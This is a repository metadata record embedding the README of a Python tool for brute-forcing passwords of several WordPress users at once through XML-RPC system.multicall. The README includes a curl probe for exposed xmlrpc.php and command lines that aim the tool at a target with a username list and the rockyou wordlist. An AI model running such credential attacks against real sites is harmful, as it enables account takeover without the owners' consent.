{"id":14955046,"url":"https://github.com/entr0pie/wp-multi-bruteforce","last_synced_at":"2025-10-26T04:18:59.993Z","repository":{"id":157769692,"uuid":"567052584","full_name":"entr0pie/wp-multi-bruteforce","owner":"entr0pie","description":"Script for bruteforcing multiple Wordpress Users (XMLRPC)","archived":false,"fork":false,"pushed_at":"2023-01-14T04:45:45.000Z","size":239,"stargazers_count":8,"open_issues_count":0,"forks_count":4,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-01-29T08:33:53.217Z","etag":null,"topics":["brute-force","brute-force-attacks","bruteforce-wordlist","bruteforcing","wordpress","wordpress-api","wordpress-security","wordpress-site","xml","xmlrpc","xmlrpc-bruteforcer"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/entr0pie.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2022-11-17T00:56:09.000Z","updated_at":"2024-11-30T12:02:04.000Z","dependencies_parsed_at":null,"dependency_job_id":"6743f708-feb3-4477-a8b2-64a82e0b879c","html_url":"https://github.com/entr0pie/wp-multi-bruteforce","commit_stats":{"total_commits":26,"total_committers":2,"mean_commits":13.0,"dds":0.1923076923076923,"last_synced_commit":"c0c9b0c085b294ba3561b54dd3dcadc2788126d9"},"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/entr0pie%2Fwp-multi-bruteforce","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/entr0pie%2Fwp-multi-bruteforce/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/entr0pie%2Fwp-multi-bruteforce/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/entr0pie%2Fwp-multi-bruteforce/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/entr0pie","download_url":"https://codeload.github.com/entr0pie/wp-multi-bruteforce/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":237932056,"owners_count":19389560,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["brute-force","brute-force-attacks","bruteforce-wordlist","bruteforcing","wordpress","wordpress-api","wordpress-security","wordpress-site","xml","xmlrpc","xmlrpc-bruteforcer"],"created_at":"2024-09-24T13:10:26.506Z","updated_at":"2025-10-24T07:30:41.989Z","avatar_url":"https://github.com/entr0pie.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# WP Multi-User Bruteforce\nPython 3 script for bruteforcing multiple Wordpress users using only one request per password.\n\n\u003cimg src=\"xmlrpc.png\" alt=\"basic usage\" width=\"600\"/\u003e\n\n\n## How does it work?\n\n\nThe [Hacktrick's Wordpress Pentesting Guide](https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/wordpress#xml-rpc) mentions that, if xmlrpc.php is enabled, Bruteforcing and DoS attacks can be used by abusing the system functionalities, including trying multiple users with **only one request**, using the `system.multicall` function (see [here](https://1517081779-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FILyTlmNzv1D9YhHQAJo2%2Fimage.png?alt=media\u0026token=5aa88cc4-baa0-4e54-87c1-2cc31203199d)).\n\n\n## Testing the vulnerability\n\n\nRun this command, replacing `your-blog.com` with your website:\n\n\n```\nYOURBLOG=http://your-blog.com/xmlrpc.php\ncurl -d \"\u003cmethodCall\u003e\u003cmethodName\u003esystem.listMethods\u003c/methodName\u003e\u003cparams\u003e\u003c/params\u003e\u003c/methodCall\u003e\" -X POST $YOURBLOG\n``` \n\nSee if the response is an XML with all functionalities available, like: \n\n\n```\n\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\n\u003cmethodResponse\u003e\n  \u003cparams\u003e\n    \u003cparam\u003e\n      \u003cvalue\u003e\n      \u003carray\u003e\u003cdata\u003e\n  \u003cvalue\u003e\u003cstring\u003esystem.multicall\u003c/string\u003e\u003c/value\u003e\n  \u003cvalue\u003e\u003cstring\u003esystem.listMethods\u003c/string\u003e\u003c/value\u003e\n  \u003cvalue\u003e\u003cstring\u003esystem.getCapabilities\u003c/string\u003e\u003c/value\u003e\n  \u003cvalue\u003e\u003cstring\u003edemo.addTwoNumbers\u003c/string\u003e\u003c/value\u003e\n  [...]\n```\n\n\nIf yes, it's probably vulnerable.\n\n\n## Installation\n\n\n```\npip install requests\ncurl https://raw.githubusercontent.com/entr0pie/xmlrpc-multi-request/main/xmlrpc.py | tee xmlrpc.py \n```\n\n\n## Usage\n\n\n### Using the default wordlist (rockyou.txt)\n\n\n```\npython3 xmlrpc.py --target=https://your-blog.com --users admin,editor,reader\n```\n\n\n### Setting an wordlist:\n\n\n```\npython3 xmlrpc.py --target=https://your-blog.com --users admin,editor,reader --wordlist=my_wordlist.txt\n```\n\n\n### Start the bruteforce with an specific word inside the wordlist:\n\n\n```\npython3 xmlrpc.py --target=https://your-blog.com --users admin,editor,reader --wordlist=my_wordlist.txt --word=super_secure_password\n```\n\n\n### Using the config.json file:\n\n\nBy default, xmlrpc.py saves in the `config.json` the last session:\n\n\n```\n{\n    \"host\":\"http://your-blog.com/xmlrpc.php\",\n    \"users\":\"['admin', 'editor', 'reader']\",\n    \"wordlist\":\"/usr/share/wordlists/rockyou.txt\",\n    \"word\":\"mcfly\",\n    \"debug\":\"False\"\n}\n```\n\n\nYou can replay that session running:\n\n\n```\npython3 xmlrpc.py --config config.json\n``` \n\n\n## License\n\n\nThis project is under [GNU GPLv3](LICENSE).\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fentr0pie%2Fwp-multi-bruteforce","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fentr0pie%2Fwp-multi-bruteforce","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fentr0pie%2Fwp-multi-bruteforce/lists"}